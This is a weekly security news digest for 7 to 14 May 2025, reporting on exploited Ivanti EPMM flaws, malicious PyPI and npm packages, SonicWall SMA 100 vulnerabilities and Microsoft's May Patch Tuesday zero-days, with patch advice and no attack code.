05/07/2025-05/14/2025 Ivanti EPMM Vulnerabilities, Malicious PyPI Package Posing as Solana Tool, Thousands of Node Developers Compromised And More

1. Ivanti EPMM Vulnerabilities Exploited in the Wild (CVE-2025-4427, CVE-2025-4428)

Ivanti has confirmed that attackers exploited vulnerabilities in open-source libraries to compromise on-prem Endpoint Manager Mobile (EPMM) instances of a small number of customers. The flaws, now tracked as CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution), were found in unnamed libraries and likely used as zero-days. CERT-EU flagged the issues, suggesting potential breaches of EU institutions.

Ivanti has released patched EPMM versions (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) and advises customers to update or apply mitigations if upgrades aren’t possible. These issues affect only the on-prem EPMM product. Additionally, Ivanti patched flaws in other products: CVE-2025-22462 (auth bypass in Neurons for ITSM), CVE-2025-22460 (default credentials in Cloud Services), and an unnumbered authorization flaw in Neurons for MDM. These were reported by researchers and haven’t been seen in attacks yet.

2. Malicious PyPI Package Posing as Solana Tool Stole Source Code in 761 Downloads

Cybersecurity researchers have uncovered a malicious package on PyPI, named solana-token, which pretended to be related to the Solana blockchain but was designed to steal source code and developer secrets. Though now removed, it was downloaded 761 times since its release in April 2024.

According to ReversingLabs, the package contained a fake blockchain function, register_node(), which exfiltrated source code from the Python execution stack to a hard-coded IP address. The malware appeared to target developers working on blockchain projects, likely hoping to capture sensitive, hard-coded secrets.
The method of distribution remains unclear, though it may have been promoted on developer platforms. The incident highlights the growing trend of supply chain attacks targeting the cryptocurrency space.

Experts urge development teams to closely inspect open-source and third-party packages.

3. Thousands of Node Developers Compromised by Malware in Popular npm Packages

Malware is increasingly infiltrating the Node.js ecosystem via npm packages. Aikido Security uncovered a major supply chain attack involving the popular “rand-user-agent” package, downloaded over 45,000 times weekly. This package, used for generating randomized user-agent strings in web scraping, was found to contain a sophisticated remote access trojan (RAT). Though deprecated, the package saw three suspicious updates in recent weeks, likely after the original developer’s npm access token was compromised. Hackers used whitespace and code obfuscation to hide the RAT, which can execute shell commands and replace Python toolkits with malicious binaries. The malicious versions have since been removed, but the incident underscores the risks of compromised open-source libraries. Over 30 other npm packages used “rand-user-agent” as a dependency.

Other recent npm compromises include backdoored versions of xrpl.js and fake developer tools that hijack macOS features, showing that attackers are increasingly targeting developers and open-source repositories.

4. SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

SonicWall has released patches for three vulnerabilities in SMA 100 Series appliances that could lead to remote code execution if chained together. The flaws affect devices including SMA 200, 210, 400, 410, and 500v and are fixed in version 10.2.1.15-81sv.

The issues are:

• CVE-2025-32819 (CVSS 8.8): Lets an attacker delete arbitrary files, potentially triggering a factory reset.
• CVE-2025-32820 (CVSS 8.3): Makes any directory writable via path traversal.
• CVE-2025-32821 (CVSS 6.7): Allows file uploads via shell command injection.

Rapid7 warns these can be chained to gain root-level remote code execution. CVE-2025-32819 may be a patch bypass for a 2021 flaw and could have been exploited as a zero-day, though SonicWall hasn’t confirmed active abuse.

Users are strongly urged to update their systems immediately.

5. Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

Microsoft’s May 2025 Patch Tuesday update fixes 78 vulnerabilities, including five zero-days under active exploitation. Of these flaws, 11 are Critical, 66 Important, and 28 allow remote code execution. The update also includes fixes for Edge browser issues.

The five exploited zero-days are:

• CVE-2025-30397 – Scripting Engine memory corruption enabling remote code execution;
  CVE-2025-30400 – Desktop Window Manager (DWM) privilege escalation;
• CVE-2025-32701 & 32706 – Common Log File System (CLFS) driver privilege escalations;
• CVE-2025-32709 – WinSock driver privilege escalation.

These flaws are linked to malware like QakBot and Play ransomware, and some have been exploited by APT groups.

CISA has added the five zero-days to its Known Exploited Vulnerabilities catalog, requiring U.S. federal agencies to patch by June 3, 2025. Additional fixes address bugs in Microsoft Defender for Endpoint and Identity, and a CVSS 10.0 flaw in Azure DevOps Server, now mitigated in the cloud.